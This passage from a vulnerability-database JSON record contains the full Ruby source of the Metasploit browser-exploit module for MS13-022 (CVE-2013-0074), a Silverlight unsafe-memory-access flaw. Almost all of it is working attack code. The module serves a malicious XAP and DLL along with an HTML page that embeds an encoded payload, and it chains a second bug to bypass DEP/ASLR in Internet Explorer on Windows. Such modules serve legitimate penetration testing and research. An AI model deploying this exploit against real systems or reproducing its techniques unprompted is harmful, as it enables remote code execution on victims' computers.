leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1.\n", "modified": "2017-07-24T13:26:21", "published": "2013-11-22T22:41:56", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_022_SILVERLIGHT_SCRIPT_OBJECT", "href": "", "type": "metasploit", "title": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n MANIFEST = <<-EOS\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\n <Deployment.Parts>\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\n </Deployment.Parts>\n</Deployment>\n EOS\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\n 'Description' => %q{\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'James Forshaw', # RCE Vulnerability discovery\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0074' ],\n [ 'CVE', '2013-3896' ],\n [ 'OSVDB', '91147' ],\n [ 'OSVDB', '98223' ],\n [ 'BID', '58327' ],\n [ 'BID', '62793' ],\n [ 'MSB', 'MS13-022' ],\n [ 'MSB', 'MS13-087' ],\n [ 'PACKETSTORM', '123731' ]\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => OperatingSystems::Match::WINDOWS,\n :ua_name => Msf::HttpClients::IE,\n :silverlight => \"true\"\n },\n 'Targets' =>\n [\n [ 'Windows x86/x64', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 12 2013\",\n 'DefaultTarget' => 0))\n\n end\n\n def setup\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\n super\n end\n\n def exploit_template(cli, target_info)\n\n my_payload = get_payload(cli, target_info)\n\n # Align to 4 bytes the x86 payload\n while my_payload.length % 4 != 0\n my_payload = \"\\x90\" + my_payload\n end\n\n my_payload = Rex::Text.encode_base64(my_payload)\n\n html_template = <<-EOF\n<html>\n<!-- saved from url=(0014)about:internet -->\n<head>\n <title>Silverlight Application</title>\n <style type=\"text/css\">\n html, body { height: 100%; overflow: auto; }\n body { padding: 0; margin: 0; }\n #form1 { height: 99%; }\n #silverlightControlHost { text-align:center; }\n </style>\n</head>\n<body>\n <form id=\"form1\" runat=\"server\" >\n <div id=\"silverlightControlHost\">\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\n <param name=\"background\" value=\"white\" />\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\n </object>\n </div>\n </form>\n</body>\n</html>\nEOF\n\n return html_template, binding()\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"request: #{request.uri}\")\n if request.uri =~ /#{@xap_name}$/\n print_status(\"Sending XAP...\")\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n elsif request.uri =~ /#{@dll_name}$/\n print_status(\"Sending DLL...\")\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n elsif request.uri =~ /AppManifest.xaml$/\n print_status(\"Sending XAML...\")\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n else\n print_status(\"Sending HTML...\")\n send_exploit_html(cli, exploit_template(cli, target_info))\n end\n end\nend\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb"}]}